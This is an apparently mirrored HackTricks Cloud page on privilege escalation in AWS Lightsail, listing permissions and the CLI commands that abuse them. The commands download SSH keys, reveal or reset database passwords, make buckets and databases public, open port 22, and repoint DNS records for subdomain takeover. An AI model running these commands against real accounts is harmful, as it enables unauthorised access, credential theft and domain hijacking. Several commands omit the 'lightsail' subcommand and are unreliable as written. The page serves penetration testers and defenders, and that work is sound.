🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS - Lightsail Privesc

AWS - Lightsail Privesc

{{#include ../../../../banners/hacktricks-training.md}}

Lightsail

For more information about Lightsail check:

{{#ref}}
../../aws-services/aws-lightsail-enum.md
{{#endref}}

⚠️ Warning
It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service.

lightsail:DownloadDefaultKeyPair

This permission will allow you to get the SSH keys to access the instances:

aws lightsail download-default-key-pair

Potential Impact: Find sensitive info inside the instances.

lightsail:GetInstanceAccessDetails

This permission will allow you to generate SSH keys to access the instances:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potential Impact: Find sensitive info inside the instances.

lightsail:CreateBucketAccessKey

This permission will allow you to get a key to access the bucket:

aws lightsail create-bucket-access-key --bucket-name <name>

Potential Impact: Find sensitive info inside the bucket.

lightsail:GetRelationalDatabaseMasterUserPassword

This permission will allow you to get the credentials to access the database:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potential Impact: Find sensitive info inside the database.

lightsail:UpdateRelationalDatabase

This permission will allow you to change the password to access the database:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

If the database isn't public, you could also make it public with this permissions with

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potential Impact: Find sensitive info inside the database.

lightsail:OpenInstancePublicPorts

This permission allow to open ports to the Internet

aws lightsail open-instance-public-ports \
    --instance-name MEAN-2 \
    --port-info fromPort=22,protocol=TCP,toPort=22

Potential Impact: Access sensitive ports.

lightsail:PutInstancePublicPorts

This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it.

aws lightsail put-instance-public-ports \
    --instance-name MEAN-2 \
    --port-infos fromPort=22,protocol=TCP,toPort=22

Potential Impact: Access sensitive ports.

lightsail:SetResourceAccessForBucket

This permissions allows to give an instances access to a bucket without any extra credentials

aws set-resource-access-for-bucket \
    --resource-name <instance-name> \
    --bucket-name <bucket-name> \
    --access allow

Potential Impact: Potential new access to buckets with sensitive information.

lightsail:UpdateBucket

With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potential Impact: Potential new access to buckets with sensitive information.

lightsail:UpdateContainerService

With this permissions an attacker could grant access to private ECRs from the containers service

aws update-container-service \
    --service-name <name> \
    --private-registry-access ecrImagePullerRole={isActive=boolean}

Potential Impact: Get sensitive information from private ECR

lightsail:CreateDomainEntry

An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.

aws lightsail create-domain-entry \
    --domain-name example.com \
    --domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potential Impact: Takeover a domain

lightsail:UpdateDomainEntry

An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.

aws lightsail update-domain-entry \
    --domain-name example.com \
    --domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potential Impact: Takeover a domain

{{#include ../../../../banners/hacktricks-training.md}}